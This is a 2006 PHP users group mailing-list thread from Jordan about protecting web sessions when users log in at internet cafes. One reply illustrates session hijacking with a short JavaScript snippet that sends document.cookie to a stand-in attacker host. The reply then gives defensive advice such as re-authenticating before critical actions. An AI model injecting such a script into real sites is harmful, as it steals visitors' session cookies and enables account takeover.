Well that is not a solution, Session hijacking is a common and realativley an easy attack; not only in internet cafes but you can do that using _javascript_, and even firefox nor opera protects aginst session hijacking.
This can steal the session from your server:
<script>
document.location =
'http://www.badguys.com/cgi-bin/cookie.php?' +
document.cookie;
</script> So if you are talking about your own application and how to protect from session hijacking there are lots of things you need to do beside using ssl and cryptograpgy. For instance in user management section you have to have the user enter their old password in order to get a new password, and challenging the users to re-enter their password to access critical pages like the purchase pages to add new credit card ...etc. If i want to answer your question i would need to write 100s of pages, but session hijacking is a huge topic and you can read about it on the internet.
If your worst fear is internet cafes so here is my advice, do not access vulrnable sites, and don't go to untrusted internet cafes for purchases or critical stuff.
--Zaid
On 2/26/06, Ala'a Ibrahim <[EMAIL PROTECTED]> wrote:
Well,
That would sound great when I tell it to the clients, ofcourse after giving them 10000 lectures so they would understand what the hell I'm talking about ... :p
On 2/26/06, Al-Faisal El-Dajani <[EMAIL PROTECTED] > wrote:I have an idea, but i'm not sure of it's validity...
Why don't you bring a flash disk with you that has firefox on it? and use it to browse the internet?
that way all related files/cookies/stuff would be on your flash, right?
On 2/26/06, Ala'a Ibrahim < [EMAIL PROTECTED] > wrote:Dear Group,_______________________________________________
Imagine this setuation, you are in an Internet Cafe, you logged in to some account on the internet (Even if it was HTTPS), a cookie, or a session id cookie would be put on your computer, in IE the cookies would be put in some file on your computer, now if the Internet cafe supervisor got into your computer, he can read all the cookies he wants, and then set them on his machine, and (in the case of sessions) he could use your account until one of you logs out (in case of cookies, it's gone forever).
does anybody knows a way to solve that ...
PS: in the Internet Cafe you both have the same IP, so it's useless to try to save the IP in your session.
My Best solution is to tell everybody not to go to internet cafes ....
--
Ala'a A. Ibrahim
http://alaa83.blogspot.com/
Jordan PHP Users Group
http://php.jolug.org/
Php mailing list
[email protected]
http://mail.jolug.org/mailman/listinfo/php_jolug.org
--
Al-Faisal El-Dajani
Tel: +962-7-77 799 781
URL: http://www.linuxhome.trickip.net
P.O Box: 140056
11814 Amman, Jordan
May the source be with you
_______________________________________________
Jordan PHP Users Group
http://php.jolug.org/
Php mailing list
[email protected]
http://mail.jolug.org/mailman/listinfo/php_jolug.org
--
Ala'a A. Ibrahim
http://alaa83.blogspot.com/
_______________________________________________
Jordan PHP Users Group
http://php.jolug.org/
Php mailing list
[email protected]
http://mail.jolug.org/mailman/listinfo/php_jolug.org
_______________________________________________ Jordan PHP Users Group http://php.jolug.org/ Php mailing list [email protected] http://mail.jolug.org/mailman/listinfo/php_jolug.org
